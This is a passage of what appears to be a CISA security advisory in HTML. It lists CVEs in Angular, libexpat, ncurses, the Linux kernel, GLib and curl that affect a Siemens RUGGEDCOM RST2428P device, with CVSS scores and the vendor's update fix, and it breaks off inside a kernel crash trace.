<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66035</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is a XSRF token leakage via protocol-relative URLs in angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with protocol-relative URL (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding using protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66035">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/201.html">CWE-201 Insertion of Sensitive Information Into Sent Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66382</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66382">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/407.html">CWE-407 Inefficient Algorithmic Complexity</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66412</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66412">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-69720</a></h3>
<div class="csaf-accordion-content">
<p>The infocmp command-line tool in ncurses before 6.5-20251213 has a stack-based buffer overflow in analyze_string in progs/infocmp.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-69720">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71185</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation Make sure to drop the reference taken when looking up the crossbar platform device during am335x route allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71185">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71186</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: stm32: dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71186">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71188</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: lpc18xx-dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71188">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71189</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw: dmamux: fix OF node leak on route allocation failure Make sure to drop the reference taken to the DMA master OF node also on late route allocation failures.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71189">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71190</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: bcm-sba-raid: fix device leak on probe Make sure to drop the reference taken when looking up the mailbox device during probe on probe failures and on driver unbind.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71190">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71191</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: at_hdmac: fix device leak on of_dma_xlate() Make sure to drop the reference taken when looking up the DMA platform device during of_dma_xlate() when releasing channel resources. Note that commit 3832b78b3ec2 ("dmaengine: at_hdmac: add missing put_device() call in at_dma_xlate()") fixed the leak in a couple of error paths but the reference is still leaking on successful allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71191">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1484</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1484">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.2</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1489</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1489">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-3784</a></h3>
<div class="csaf-accordion-content">
<p>curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a server, even if the new request uses different credentials for the HTTP proxy. The proper behavior is to create or use a separate connection.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-3784">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/305.html">CWE-305 Authentication Bypass by Primary Weakness</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22610</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular’s internal sanitization schema fails to recognize the href and xlink:href attributes of SVG elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22610">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22976</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset `qfq_class-&gt;leaf_qdisc-&gt;q.qlen &gt; 0` does not imply that the class itself is active. Two qfq_class objects may point to the same leaf_qdisc. This happens when: 1. one QFQ qdisc is attached to the dev as the root qdisc, and 2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get() / qdisc_put()) and is pending to be destroyed, as in function tc_new_tfilter. When packets are enqueued through the root QFQ qdisc, the shared leaf_qdisc-&gt;q.qlen increases. At the same time, the second QFQ qdisc triggers qdisc_put and qdisc_destroy: the qdisc enters qfq_reset() with its own q-&gt;q.qlen == 0, but its class's leaf qdisc-&gt;q.qlen &gt; 0. Therefore, the qfq_reset would wrongly deactivate an inactive aggregate and trigger a null-deref in qfq_deactivate_agg: [ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 0.903571] #PF: supervisor write access in kernel mode [ 0.903860] #PF: error_code(0x0002) - not-present page [ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0 [ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI [ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE 